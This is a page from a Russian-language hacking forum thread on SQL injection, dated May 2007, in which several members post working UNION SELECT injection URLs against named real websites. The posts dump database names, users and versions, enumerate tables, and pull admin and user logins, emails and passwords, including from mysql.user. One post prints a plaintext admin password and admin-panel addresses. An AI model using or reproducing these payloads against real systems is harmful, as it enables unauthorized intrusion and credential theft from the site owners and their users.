HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 1589 из 1602 « Первая < 5891089148915391579 1585 1586 1587 1588 1589 1590 1591 1592 1593 1599 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 15.05.2007, 16:12
kamaz
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013

Репутация: 453
Отправить сообщение для kamaz с помощью ICQ
По умолчанию
+1 - 5 версия.
Вывод данных:

Код:
http://www.oppozicia.com/index.php?lang=1&part_id=39&year_id=2007&month_id=-01+union+select+1,concat(nickname,char(58),email,char(58),passwd),3%20from%20forum_users/*
Код:
http://www.oppozicia.com/index.php?lang=1&part_id=39&year_id=2007&month_id=-01+union+select+1,concat(user_login,char(58),user_email,char(58),user_pass),3%20from%20users_ru/*
Код:
http://www.oppozicia.com/index.php?lang=1&part_id=39&year_id=2007&month_id=-01+union+select+1,concat_ws(char(58),absnum,level,position,name,alias,approved,description),3%20from%20admins/*
 
Ответить с цитированием

  #2  
Старый 15.05.2007, 16:43
Joker-jar
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659

Репутация: 646


Отправить сообщение для Joker-jar с помощью ICQ
По умолчанию
Цитата:
Сообщение от [53x]Shadow  
Все там с выводом, глаза разуйте, или посмотрите чуть выше пост крота!
Если запрос:
Код:
http://www.oppozicia.com/index.php?lang=1&part_id=39&year_id=2007&month_id=-01+union+select+1,2,3/*
То на странице:
Народная оппозиция 2 - это и есть вывод!
Сорри, затупил. С кем не бывает?
 
Ответить с цитированием

  #3  
Старый 16.05.2007, 15:29
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию
Код:
http://www.bonus.ru/video/index.phtml?film_id=999999999+union+select+1,2,convert(concat(database(),char(58),user(),char(58),version()),char),4,5,6,7,8,9,10,11/*
-------------

Код:
http://film.topd.ru/details.php?Id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(database(),char(58),user(),char(58),version()),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*
-------------

Код:
http://www.studentport.su/referat/cardinfo.php?id_card=-1+union+select+1,2,convert(concat(database(),char(58),user(),char(58),version()),char),4,5,6,7,8,9,10,11,12/*
http://www.studentport.su/referat/cardinfo.php?id_card=-1+union+select+1,2,convert(concat(user,char(58),password),char),4,5,6,7,8,9,10,11,12+from+mysql.user/*
-------------

Код:
http://www.natc.ru/clubs/forsazh/paper/?view=true&id=-1+union+select+1,2,3,4,5,6,7,8,concat(database(),char(58),user(),char(58),version()),10,11,12,13,14/*
-------------

Код:
http://teo.poliglos.info/main.php?id='+union+select+concat(database(),char(58),user(),char(58),version())/*
Интересных таблиц не нашел:

Код:
http://teo.poliglos.info/main.php?id='+union+select+table_name+from+information_schema.tables+limit+45,1/*
 
Ответить с цитированием

  #4  
Старый 16.05.2007, 23:12
jmp_$-3
Новичок
Регистрация: 27.03.2006
Сообщений: 1
Провел на форуме:
4380

Репутация: 0
По умолчанию
ХЭttp://tik.ru/pages/search.php?search=%27

Код:
TABLE_NAME:
tik_pages
tik_users
Код:
TABLE_STRUCT (tik_users):
1, 2, 3, pass, login, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18
Интересная игрушка
Дыры множественные в разных скриптах, в том числе межсайтовый скриптинг, инъекции.
 
Ответить с цитированием

sql-inj
  #5  
Старый 16.05.2007, 23:45
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow sql-inj
Коррозия Металла

http://www.korroziametalla.com/
уязвимость: http://www.korroziametalla.com/news_arh.php?year=2007&id=49'
-> mysql 5
смотрим таблицы стандартными средствами пятой версии:
Цитата:
http://www.korroziametalla.com/news_arh.php?year=2007&id=-49+union+select+1,2,3,table_name,5+from+informatio n_schema.tables+limit+0,1/*
находим обращаем внимание на kor_forum и kor_admin. смотрим колонки аналогичным образом, потом смотрим в них и видим логин/пароль, пароль в незашифрованном виде
Цитата:
http://www.korroziametalla.com/news_arh.php?year=2007&id=-49+union+select+1,2,3,concat_ws(0x3a,id,login,pass word),5+from+kor_admin+limit+0,1/*
админка
Цитата:
http://www.korroziametalla.com/admin/
Последний раз редактировалось Серенький; 16.05.2007 в 23:47..
 
Ответить с цитированием

  #6  
Старый 17.05.2007, 12:01
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию
Код:
http://www.dubovoe.ru/print.php?news_id=-1+union+select+1,2,3,4,5,6,concat(database(),char(58),user(),char(58),version()),8,9,10,11,12,13,14,15/*
Код:
http://campus4.best-host.ru/index.php?news=-1+union+select+1,2,3,4,5/*
 
Ответить с цитированием

sql
  #7  
Старый 21.05.2007, 16:45
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow sql
скулечка

http://www.safemaster.ru/
admins(login,pass)
Цитата:
http://www.safemaster.ru/info.php?id=-468+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 ,concat(login,0x3a,pass)+from+admins+limit+0,1/*
пасы открытые:
admin:3362278811
админка
Цитата:
http://www.safemaster.ru/admin/
 
Ответить с цитированием

  #8  
Старый 21.05.2007, 20:39
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию
Код:
http://krolik.ru/sex/list.php?tid=-1+union+select+1,convert(concat(database(),char(58),user(),char(58),version()),char),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
http://krolik.ru/sex/list.php?tid=-1+union+select+1,concat(id,char(58),name,char(58),pass,char(58),email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+autors+limit+600,1/*
 
Ответить с цитированием

  #9  
Старый 21.05.2007, 20:49
kamaz
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013

Репутация: 453
Отправить сообщение для kamaz с помощью ICQ
По умолчанию
Код:
http://www.towardspakistan.com/profile.php?u_id=-365%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14/*
Код:
http://www.team-telefragged.de/user.php?id=2%20union%20select%201,2,3,4,5,6,7,8,9,0,11,12/*
Код:
http://www.sudokucraving.com/user.php?id=-1+UNION+SELECT+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15/*
Код:
http://writers-pen.com/user.php?id=-1%20union%20select%201,2,3,4,5,6,database(),8,9,0,11%20from%20users/*
____
 
Ответить с цитированием

  #10  
Старый 22.05.2007, 12:33
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию
Код:
http://www.guzhelya.com/news.php?n=-1+union+select+1,concat(database(),char(58),user(),char(58),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
 
Ответить с цитированием
Ответ
Страница 1589 из 1602 « Первая < 5891089148915391579 1585 1586 1587 1588 1589 1590 1591 1592 1593 1599 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ